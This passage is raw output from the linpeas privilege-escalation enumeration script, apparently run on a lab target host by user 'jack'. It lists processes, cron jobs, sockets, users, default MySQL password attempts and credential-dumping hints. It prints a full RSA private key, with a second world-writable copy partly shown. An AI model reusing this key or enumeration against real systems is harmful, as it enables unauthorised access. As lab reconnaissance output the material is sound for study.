root       928  0.0  0.0  13372   160 ?        Ss   14:49   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemon[0mise --scan --syslog
root       954  0.0  0.6 277180  6152 ?        Ssl  14:49   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       958  0.0  0.0   5220   152 ?        Ss   14:49   0:00 /sbin/iscsid
root       959  0.0  0.3   5720  3516 ?        S<Ls 14:49   0:00 /sbin/iscsid
root      1005  0.0  0.5  65512  5352 ?        Ss   14:49   0:00 /usr/sbin/sshd -D
jack      1526  0.0  0.3  92804  4008 ?        S    14:50   0:00  |   _ sshd: jack@pts/0
jack      1527  0.0  0.5  22576  5292 pts/0    Ss+  14:50   0:00  |       _ -bash
jack      6904  0.0  0.3  92804  3396 ?        S    15:14   0:00      _ sshd: jack@pts/1
jack      6905  0.0  0.5  22568  5172 pts/1    Ss   15:14   0:00          _ -bash
jack     20307  0.2  0.2   5408  2548 pts/1    S+   15:16   0:00              _ /bin/sh ./linpeas.sh
jack     24475  0.0  0.0   5408   996 pts/1    S+   15:16   0:00                  _ /bin/sh ./linpeas.sh
jack     24479  0.0  0.3  37508  3376 pts/1    R+   15:16   0:00                  |   _ ps fauxwww
jack     24478  0.0  0.0   5408   996 pts/1    S+   15:16   0:00                  _ /bin/sh ./linpeas.sh
root      1057  0.0  0.2  15752  2160 ttyS0    Ss+  14:49   0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root      1060  0.0  0.1  15936  1796 tty1     Ss+  14:49   0:00 /sbin/agetty --noclear tty1 linux
root      1122  0.0  0.3  21168  3584 ?        S    14:49   0:00 /bin/bash /usr/bin/mysqld_safe
mysql     1283  0.0  6.7 598116 68240 ?        Sl   14:49   0:01  _ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --skip-log-error --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1284  0.0  0.1  26088  1412 ?        S    14:49   0:00  _ logger -t mysqld -p daemon error
root      1197  0.0  3.4 429088 35344 ?        Ss   14:49   0:00 /usr/sbin/apache2 -k start
www-data  1353  0.0  3.5 505884 35820 ?        S    14:49   0:00  _ /usr/sbin/apache2 -k start
www-data  1354  0.0  4.0 508020 40908 ?        S    14:49   0:00  _ /usr/sbin/apache2 -k start
www-data  1355  0.0  3.5 505884 35772 ?        S    14:49   0:00  _ /usr/sbin/apache2 -k start
www-data  1356  0.0  3.5 505884 35772 ?        S    14:49   0:00  _ /usr/sbin/apache2 -k start
www-data  1357  0.0  3.5 505884 35772 ?        S    14:49   0:00  _ /usr/sbin/apache2 -k start
www-data  1458  0.0  3.5 505884 35772 ?        S    14:50   0:00  _ /usr/sbin/apache2 -k start
jack      1464  0.0  0.4  45280  4728 ?        Ss   14:50   0:00 /lib/systemd/systemd --user
jack      1466  0.0  0.2  61468  2156 ?        S    14:50   0:00  _ (sd-pam)

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Files opened by processes belonging to other users
This is usually empty because of the lack of privileges to read other user processes information
COMMAND     PID   TID             USER   FD      TYPE             DEVICE SIZE/OFF       NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 process found (dump creds from memory as root)
sshd: process found (dump creds from memory as root)

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root     722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 Jan  9  2020 .
drwxr-xr-x 96 root root 4096 Jan 13  2020 ..
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  670 Jun 22  2017 php
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  191 Jan  8  2020 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x  2 root root 4096 Jan  9  2020 .
drwxr-xr-x 96 root root 4096 Jan 13  2020 ..
-rwxr-xr-x  1 root root  539 Jun 11  2018 apache2
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Oct  9  2018 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root  372 May  5  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  214 Dec  7  2018 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Jan  8  2020 .
drwxr-xr-x 96 root root 4096 Jan 13  2020 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Jan  8  2020 .
drwxr-xr-x 96 root root 4096 Jan 13  2020 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Jan  8  2020 .
drwxr-xr-x 96 root root 4096 Jan 13  2020 ..
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  211 Dec  7  2018 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service is executing some relative path
/lib/systemd/system/emergency.service is executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                         LEFT     LAST                         PASSED    UNIT                         ACTIVATES
Thu 2023-01-19 05:01:57 CST  13h left Wed 2023-01-18 14:49:24 CST  27min ago apt-daily.timer              apt-daily.service
Thu 2023-01-19 06:03:24 CST  14h left Wed 2023-01-18 14:49:24 CST  27min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Thu 2023-01-19 15:04:40 CST  23h left Wed 2023-01-18 15:04:40 CST  11min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a                          n/a      n/a                          n/a       snapd.snap-repair.timer      snapd.snap-repair.service
n/a                          n/a      n/a                          n/a       ureadahead-stop.timer        ureadahead-stop.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-bus-proxyd.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/acpid.socket
  └─(Read Write)
/run/dbus/system_bus_socket
  └─(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
  └─(Read Write)
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/udev/control
/run/user/1000/systemd/notify
  └─(Read Write)
/run/user/1000/systemd/private
  └─(Read Write)
/run/uuidd/request
  └─(Read Write)
/var/lib/lxd/unix.socket
/var/run/dbus/system_bus_socket
  └─(Read Write)
/var/run/mysqld/mysqld.sock
  └─(Read Write)

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf (        <policy user="dnsmasq">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.network1.conf (        <policy user="systemd-network">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.resolve1.conf (        <policy user="systemd-resolve">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                                 PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION        
:1.0                                 879 systemd-logind  root             :1.0          systemd-logind.service    -          -                  
:1.1                                   1 systemd         root             :1.1          init.scope                -          -                  
:1.2                                 913 accounts-daemon[0m root             :1.2          accounts-daemon.service   -          -                  
:1.3                                 954 polkitd         root             :1.3          polkitd.service           -          -                  
:1.37                              27044 busctl          jack             :1.37         session-16.scope          16         -                  
com.ubuntu.LanguageSelector            - -               -                (activatable) -                         -         
com.ubuntu.SoftwareProperties          - -               -                (activatable) -                         -         
org.freedesktop.Accounts             913 accounts-daemon[0m root             :1.2          accounts-daemon.service   -          -                  
org.freedesktop.DBus                 901 dbus-daemon[0m     messagebus       org.freedesktop.DBus dbus.service              -          -                  
org.freedesktop.PolicyKit1           954 polkitd         root             :1.3          polkitd.service           -          -                  
org.freedesktop.hostname1              - -               -                (activatable) -                         -         
org.freedesktop.locale1                - -               -                (activatable) -                         -         
org.freedesktop.login1               879 systemd-logind  root             :1.0          systemd-logind.service    -          -                  
org.freedesktop.network1               - -               -                (activatable) -                         -         
org.freedesktop.resolve1               - -               -                (activatable) -                         -         
org.freedesktop.systemd1               1 systemd         root             :1.1          init.scope                -          -                  
org.freedesktop.timedate1              - -               -                (activatable) -                         -         


                                        ╔═════════════════════╗
════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════
                                        ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
jack
127.0.0.1	localhost
127.0.1.1	jack

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0      Link encap:Ethernet  HWaddr 02:7f:4e:0e:6e:a3  
          inet addr:10.10.12.106  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::7f:4eff:fe0e:6ea3/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:3554 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4811 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:989158 (989.1 KB)  TX bytes:1158629 (1.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:301 errors:0 dropped:0 overruns:0 frame:0
          TX packets:301 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:23204 (23.2 KB)  TX bytes:23204 (23.2 KB)


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               

╔══════════╣ Can I sniff with tcpdump?
No



                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
jack:x:1000:1000:Jack Torrance,,,:/home/jack:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=111(mysql) gid=118(mysql) groups=118(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Login now
 15:16:29 up 27 min,  2 users,  load average: 0.25, 0.16, 0.39
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jack     pts/0    10.8.19.103      14:50   19:25   0.05s  0.05s -bash
jack     pts/1    10.8.19.103      15:14   13.00s  0.08s  0.00s /bin/sh ./linpeas.sh

╔══════════╣ Last logons
root     pts/0        Fri Jan 10 18:31:17 2020 - crash                     (00:12)     192.168.1.137
reboot   system boot  Fri Jan 10 18:29:33 2020   still running                         0.0.0.0
root     pts/0        Fri Jan 10 15:00:06 2020 - crash                     (03:29)     192.168.1.137
reboot   system boot  Fri Jan 10 14:57:44 2020   still running                         0.0.0.0
jack     pts/0        Thu Jan  9 13:23:50 2020 - crash                    (1+01:33)    192.168.1.137
reboot   system boot  Thu Jan  9 13:22:38 2020   still running                         0.0.0.0
jack     pts/0        Thu Jan  9 09:57:09 2020 - crash                     (03:25)     192.168.1.137
reboot   system boot  Wed Jan  8 11:23:36 2020   still running                         0.0.0.0

wtmp begins Wed Jan  8 11:23:36 2020

╔══════════╣ Last time logon each user
Username         Port     From             Latest
root             pts/1    10.11.12.223     Mon Nov 16 14:33:47 -0600 2020
jack             pts/1    10.8.19.103      Wed Jan 18 15:14:56 -0600 2023

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                                       ╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════
                                       ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/lxc
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
/usr/share/gcc-5

╔══════════╣ MySQL
mysql  Ver 15.1 Distrib 10.0.38-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
MySQL user: mysql
user'

═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No

╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: user		= mysql
Found readable /etc/mysql/my.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 869 Feb  7  2019 /etc/mysql/mariadb.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

-rw------- 1 root root 277 Jan  9  2020 /etc/mysql/debian.cnf

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.18 (Ubuntu)
Server built:   2019-10-08T13:31:25
httpd Not Found

Nginx version: nginx Not Found

./linpeas.sh: 2593: ./linpeas.sh: grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null: not found
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jan 10  2020 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Jan 10  2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 34 Jan  9  2020 /etc/apache2/sites-enabled/octobercms.conf -> ../sites-available/octobercms.conf
lrwxrwxrwx 1 root root 35 Jan 10  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>


-rw-r--r-- 1 root root 1332 Jun 11  2018 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jan 10  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 70999 Oct 24  2019 /etc/php/7.0/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 70656 Oct 24  2019 /etc/php/7.0/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On

╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-rw---- 1 www-data www-data 3220 Jan 10  2020 /var/www/html/wp-config.php

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Sep 30  2013 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jan  8  2020 /etc/ldap

drwxr-xr-x 2 root root 4096 Jan  9  2020 /usr/share/php7.0-ldap/ldap

-rw-r--r-- 1 root root 0 Jan  9  2020 /var/lib/php/modules/7.0/apache2/enabled_by_maint/ldap

-rw-r--r-- 1 root root 0 Jan  9  2020 /var/lib/php/modules/7.0/cli/enabled_by_maint/ldap

-rw-r--r-- 1 root root 0 Jan  9  2020 /var/lib/php/modules/7.0/registry/ldap


╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)

-rw------- 1 jack jack 1675 Jan 10  2020 /home/jack/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack
-rwxrwxrwx 1 root root 1675 Jan 10  2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
